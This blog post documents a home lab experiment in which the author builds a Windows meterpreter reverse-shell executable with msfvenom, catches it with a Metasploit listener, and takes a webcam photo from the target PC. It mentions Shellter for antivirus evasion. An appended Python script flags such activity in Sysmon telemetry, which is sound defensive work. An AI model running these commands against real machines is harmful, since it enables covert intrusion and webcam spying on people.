As I mentioned in my previous post (Setting-up a Lab for Metasploit), I was trying to do an experiment to see whether I could open the webcam of a hacked Windows PC. In this article, as the title suggests, I will just take a photo from the hacked machine and save it to a local directory, which is not far from the original objective of my experiment. I think it is possible to view the live streaming from the webcam, which I may explore in the near future, but for now, I will just take a photo.
Here's how I was able to do it:
1. The initial process is basically to set up the needed infrastructure for this experiment, which I thoroughly documented in my previous post. I encountered several fuzzy problems along the way: the first time I did the procedure, everything worked just fine, but I had to stop to attend to other tasks, and when I repeated the process a few days later, sometimes the target machine and my vbox Kali wouldn't see each other on the network. After a ridiculous amount of trial and error, restarting, deleting the bridge network adapter and bringing it up again maybe around 10x, they could finally see each other.
2. The next thing I did was to create the payload which is a .exe file using msfvenom by typing the following at the Terminal Emulator:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=<IP Address> LPORT=<Port Number> -o name.exe
This payload will be uploaded to the target Windows 10 PC. In my case, I had to save it to a microSD card from my host machine, then insert it into my target machine. This .exe file is a virus, so I had to disable my firewall and antivirus. There are techniques to hide it and avoid virus detection. One method is to use Shellter. I was not able to perform this step because I could not download it. What this .exe file mainly does is open a reverse shell once the user of the target machine executes it.
3. I had to run Metasploit to listen on the port by typing the following:
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP Address>
set LPORT <Port Number>
run
4. Once the reverse shell was connected, I had to type the following to take a photo from the target machine's webcam and save it locally:
webcam_list - returns the attached webcams on the target machine
webcam_snap -i 1 -v false - takes a photo in jpeg format and saves it to a local directory
And that was it. I was supposed to take a screenshot of each step, but as I was writing this post, my Kali crashed, too sad. But it does not really matter; this post serves as documentation of my experiment.
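
Seen from the defender's side, steps 2 to 4 leave a recognizable trail: an executable started from removable media that then opens an outbound TCP session to the listener. The following is an added example, not part of the original post, that correlates process and network telemetry to flag that sequence. The event fields are a simplified, constructed form of Sysmon Event ID 1 and 3 records, and the trusted directories, port list, addresses, drive letters and PIDs are assumptions.

```python
"""Correlate process-creation and network-connection events to flag a
freshly launched executable that opens an outbound TCP session."""

# Assumption: directories from which binaries are expected to run.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumption: destination ports considered normal for user software.
COMMON_PORTS = {80, 443}

# Constructed sample events, simplified from Sysmon Event ID 1 (process
# creation) and Event ID 3 (network connection). Field names are assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4312, "image": r"E:\name.exe"},
    {"id": 1, "pid": 5120, "image": r"C:\Program Files\Browser\browser.exe"},
    {"id": 3, "pid": 5120, "initiated": True, "dst_ip": "203.0.113.10", "dst_port": 443},
    {"id": 3, "pid": 4312, "initiated": True, "dst_ip": "192.0.2.15", "dst_port": 5555},
    {"id": 1, "pid": 6001, "image": r"D:\setup.exe"},
]


def is_trusted(image):
    """True when the image path sits under one of the trusted directories."""
    return image.lower().startswith(TRUSTED_DIRS)


def find_suspicious(events):
    """Return alerts for untrusted-path processes that initiate connections."""
    untrusted = {}  # pid -> image path of processes started outside TRUSTED_DIRS
    alerts = []
    for ev in events:
        if ev["id"] == 1 and not is_trusted(ev["image"]):
            untrusted[ev["pid"]] = ev["image"]
        elif ev["id"] == 3 and ev.get("initiated") and ev["pid"] in untrusted:
            reason = "outbound connection from untrusted path"
            if ev["dst_port"] not in COMMON_PORTS:
                reason += " to uncommon port"
            alerts.append({
                "image": untrusted[ev["pid"]],
                "dst": f'{ev["dst_ip"]}:{ev["dst_port"]}',
                "reason": reason,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_EVENTS):
        print(alert)
```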